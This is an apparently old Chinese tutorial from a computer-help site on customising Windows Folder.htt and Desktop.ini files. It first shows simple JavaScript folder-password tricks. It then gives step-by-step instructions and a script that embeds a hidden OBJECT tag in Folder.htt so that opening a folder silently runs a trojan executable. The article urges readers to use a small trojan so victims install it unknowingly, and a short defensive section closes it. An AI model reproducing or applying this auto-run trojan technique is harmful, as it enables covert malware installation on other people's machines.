萬盛學電腦網

 萬盛學電腦網 >> 健康知識 >> 歡樂時光“病毒”文件的另類妙用

歡樂時光“病毒”文件的另類妙用

  您還記得當初大名鼎鼎的“歡樂時光”病毒嗎?感染該病毒的硬盤中會有多個Desktop.ini和Folder.htt文件,就算你刪除了目錄中的這兩個文件,當你再次打開該目錄時,它們又像幽靈一樣出現了。    再問大家一個與此相關的問題:在Windows系統中,重復文件最多的什麼呢?答案是Desktop.ini文件!在Windows目錄及其下的Favorites、System、Fonts、Tasks文件夾中都有該文件的身影!正是由於該文件的存在,使得它們在外觀或其他方面也與普通的文件夾有所區別。下面筆者就談談這兩個文件的一些奇妙用途。    一、給文件夾加上密碼  在學校的機房和校園網絡的管理中,是否經常會碰到這樣的情況:一些計算機常因學生誤刪了Windows目錄或SYSTEM目錄下的一些系統文件而導致無法正常啟動。是否有方法可以把Windows及其它重要目錄保護起來呢?方法是有的,我們只需在這個Folder.htt文件中進行必要的修改,5自學網,就可改變文件夾打開的方式。比如,要想在打開該文件夾前先進行安全認證,可這樣修改這個Folder.htt。    在C盤的Windows文件夾中找到Folder.htt文件(該文件為隱藏文件,並且後來經過編輯與筆者共同驗證,該文件不同的系統內容也不盡相同,本文種主要是Windows 98下的),打開Folder.htt文件。找到以下內容:    <a href=\'\'class=command onclick=\'ShowFiles(); ShowWinStat(winStat); return false;\' onMouseOver=\'ShowWinStat(!winStat); return true;\' onMouseOut=\'ShowWinStat(winStat); return true;\' onFocus=\'ShowWinStat(!winStat); return true;\' onBlur=\'ShowWinStat(winStat); return true;\'>顯示文件</a>。";  將其修改為:  <a href=\'\'class=command onclick=\'ShowFiles(); ShowWinStat(winStat); return false;\' onMouseOver=\'ShowWinStat(!winStat); return true;\' onMouseOut=\'ShowWinStat(winStat); return true;\' onFocus=\'ShowWinStat(!winStat); return true;\'    onBlur=\'ShowWinStat(winStat); return true;\'>輸入密碼</a>。";    (2)找到function ShowFiles() {  Info.innerHTML = L_Intro_Text "" L_Prompt_Text;  showFiles = true;  document.all.FileList.style.display = "";  document.all.Brand.style.display = "none";  FixSize();  }  修改為: ★function ShowFiles()    {var password=prompt("請輸入密碼:","");  if (password=="你的密碼"){Info.innerHTML = L_Intro_Text "" L_Prompt_Text;  showFiles = true;  document.all.FileList.style.display = "";  document.all.Brand.style.display = "none";  FixSize();}  else{alert("警告,密碼錯誤!您無權浏覽該目錄");}}    (3)保存修改後的Folder.htt文件,退出Windows文件夾。    完成上述操作步驟後,再進入Windows目錄時,系統提示輸入密碼,只有輸入正確的密碼才能進行該目錄。通過修改打開行為的代碼,就可實現對某個目錄的簡單加密。    當然,這種加密目錄很容易解開:不使用Web方式打開文件夾,避開執行該程序,或直接從DOS中進入該文件夾都可繞開密碼的輸入。    如果你使用的是Windows 2000系統,可以找到    ………………  <script language="JavaScript">    然後在後面加上以下代碼:    var pass =prompt("enter the password")  if (pass!="密碼")  {window.location="d:"}    就可以給文件夾加上訪問口令!這樣你的文件夾就多了一層保護。    二、任意文件夾和硬盤分區的保護  根據同樣的原理,我們可對任意文件夾及硬盤分區設置保護口今。具體操作步驟如下:    (1)打開要加密的文件夾或硬盤分區,選擇文件菜單中的“查看→自定義文件夾”。    (2)在打開的“自定義文件夾”窗口中,如圖1所示選擇“創建或編輯HTML文檔”,單擊“下一步”按鈕,再單擊“下一步”按鈕,關閉記事本編輯窗口,單擊“完成”按鈕。在當C盤Windows目錄下找到Folder.htt文件,把它復制到當前文件夾中,覆蓋原來的Folder.htt文件。    (3)打開Folder.htt文件,找到★var L_Intro_Text= "<b><font color=red>警告</font></b>修改該文件夾的內容可能導致程序運行不正常。";★(警告內容),將其修改為“自定義的內容”。完成Folder.htt的文件修改後,再進入相應的文件夾或硬盤分區,則需要提供正確口令,否則無法顯示該文件夾的內容。     圖1    (一)、利用文件夾安裝木馬    黑客可以利用文件夾來安裝木馬,其目的是對方只要打開某個文件夾就自動安裝木馬文件。知己知彼方能百戰不殆,讓我們了解一下其原理和方法。     圖2    1.先在以目錄下建立一個文件夾test文件夾,進入剛建的文件夾test點擊“工具”菜單選擇“文件夾選項”項(圖2);出來文件夾選項對話框如圖所示(圖3),把“隱藏受保護的操作系統文件(推薦)”前面打上“√”,接著出現一個警告窗口,如圖所示(圖4),直接點擊“是”。再把“隱藏文件和文件夾”下選擇“顯示所有文件和文件夾”,最後點擊確定在本目錄下出現了Folder settings隱藏文件夾和Desttop.ini隱藏文件如圖所示(圖5)。      圖3     圖4     圖5    2.現在點擊“查看”菜單選擇“自定義文件夾”項(圖6),打開的“自定義文件夾”窗口,選擇其中的“創建或編輯HTML文檔”,單擊“下一步”按鈕,再單擊“下一步”按鈕,然後關閉記事本編輯窗口,單擊“完成”按鈕,就把文件夾設置成按WEB方式打開文件夾。再打開要放木馬的文件夾,我們就在這個文件夾裡測試。Folder.Htt是文件夾的模板文件,現在我們修改文件夾的模板文件,在裡面插入一端自動運行程序的代碼:    <script language="javascript">  run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""  run_exe ="CODEBASE=\"test.exe#version=1,1,1,1\">"  run_exe ="<PARAM NAME=\"_Version\" value=\"65536\">"  run_exe ="</OBJECT>"  document.open();  document.clear();  document.writeln(run_exe);    document.close();  </script>     圖6    就是這段裡面的test.exe為你要安裝的木馬文件,這裡為了給大家看到效果我運行的是LC4。    3.現在我們把要運行的test.exe文件也copy到這個文件夾裡,好了,我們現在把文件查看屬性修改回去,就是步驟1的逆過程。    4.OK,如果你不想要木馬立即運行,請把窗口直接關閉,等管理員來運行吧。讓我們來看看效果,退出test文件夾然後雙擊test文件夾圖標,5自學網,如圖所示(圖7),怎麼樣,運行了吧,大家可以把test.exe換成小點的木馬,這樣對方就在不知道的情況下給自己裝了木馬。其實大家如果要有什麼文件要隱藏的話,就可以放到folder.htt和同目錄下,把文件夾屬性設置回去以後,用搜索都找不到這個文件。     圖7    三、總結  好了,Folder.htt和Desktop.ini文件的好的應用和需要注意的都講了,是不是覺得很有意思也很恐怖哦!現在我們說一下防范與解決辦法:    1.查看文件夾時,去掉以“Web頁方式”的選項。雖然我們看不見什麼個性化目錄了,但我們換來是安全,我認為值!但是,也請大家注意,如果不采用“WEB方式”查看文件夾前面介紹過的技巧和應用就不能正常顯示了,有得就有失啊。    2.如果沒有什麼需要,去掉默認共享和共享目錄。要是需要,公共用戶也要加上密碼,密碼只有內部人知道。只要能上傳文件,你的機器就很危險。除了上邊的方法,還可以用MIME漏洞,ASP漏洞入侵,如果是Windows 98還有共享方法。所以一定要把好關!    3.腳本病毒的一大特征就是利用WSH。要是服務器最好去掉WSH,這樣能低御許多腳本病毒。方法是:在“控制面板”裡選擇“添加/刪除程序”,選擇“Windows安裝程序”裡的附件,再選擇“詳細資料”中的“Windows Scripting Host”把它卸載掉。
copyright © 萬盛學電腦網 all rights reserved